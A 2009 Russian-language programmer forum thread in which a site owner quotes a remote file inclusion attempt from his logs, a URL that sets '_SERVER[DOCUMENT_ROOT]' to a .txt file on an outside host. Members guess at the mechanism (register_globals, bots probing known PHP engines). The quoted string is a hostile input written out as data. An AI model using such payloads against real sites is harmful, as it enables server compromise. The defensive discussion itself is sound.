Форум программистов «Весельчак У»
  *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

  • Рекомендуем проверить настройки временной зоны в вашем профиле (страница "Внешний вид форума", пункт "Часовой пояс:").
  • У нас больше нет рассылок. Если вам приходят письма от наших бывших рассылок mail.ru и subscribe.ru, то знайте, что это не мы рассылаем.
   Начало  
Наши сайты
Помощь Поиск Календарь Почта Войти Регистрация  
 
Страниц: [1]   Вниз
  Печать  
Автор Тема: Пытались взломать сайт  (Прочитано 8675 раз)
0 Пользователей и 5 Гостей смотрят эту тему.
Sla
Команда клуба

ua
Offline Offline
Пол: Мужской

WWW
« : 04-11-2009 12:49 » 

h**p://slasoft.kharkov.ua/article/7goodhobits%20%20////?_SERVER[DOCUMENT_ROOT]=h**p://www.caindeaf.or.kr/bbs/data/zfxid1.txt?

Может кто знает механизм взлома?

зы я еще не искал Жаль
Записан

Мы все учились понемногу... Чему-нибудь и как-нибудь.
Sla
Команда клуба

ua
Offline Offline
Пол: Мужской

WWW
« Ответ #1 : 04-11-2009 12:55 » 

а может в .htaccess впихнуть
redirect ///?_SERVER[DOCUMENT_ROOT] http://www.microsoft.com
Записан

Мы все учились понемногу... Чему-нибудь и как-нибудь.
RXL
Технический
Администратор

ru
Offline Offline
Пол: Мужской

WWW
« Ответ #2 : 05-11-2009 04:29 » 

Слав, я полагаю, тут расчет на register_globals.
Записан

... мы преодолеваем эту трудность без синтеза распределенных прототипов. (с) Жуков М.С.
Sla
Команда клуба

ua
Offline Offline
Пол: Мужской

WWW
« Ответ #3 : 06-11-2009 08:13 » 

не понятен механизм, вернее намерения
нужно залить шел на сервер? Но как?
Записан

Мы все учились понемногу... Чему-нибудь и как-нибудь.
Finch
Спокойный
Администратор

il
Offline Offline
Пол: Мужской
Пролетал мимо


« Ответ #4 : 06-11-2009 11:48 » 

Ну скорее всего тут взлом не совсем твоего сайта. А редиректить людей на стороний сайт. Правда, насколько я подозреваю, этот редирект будет в районе одной сессии.
Записан

Не будите спашяго дракона.
             Джаффар (Коша)
Kivals
Команда клуба

ca
Offline Offline
Пол: Мужской

WWW
« Ответ #5 : 06-11-2009 15:06 » new

Гугл выдает огромное количество подобных запросов. Похоже это зомби-машины пытаются использовать известные уязвимости в популярных движках...
Записан
RXL
Технический
Администратор

ru
Offline Offline
Пол: Мужской

WWW
« Ответ #6 : 06-11-2009 22:31 » 

Я не разбирался в деталях, но по моему атака идет на уязвимость каких-то версий специально неправильно настроенного PHP.
Записан

... мы преодолеваем эту трудность без синтеза распределенных прототипов. (с) Жуков М.С.
Страниц: [1]   Вверх
  Печать  
 

Powered by SMF 1.1.21 | SMF © 2015, Simple Machines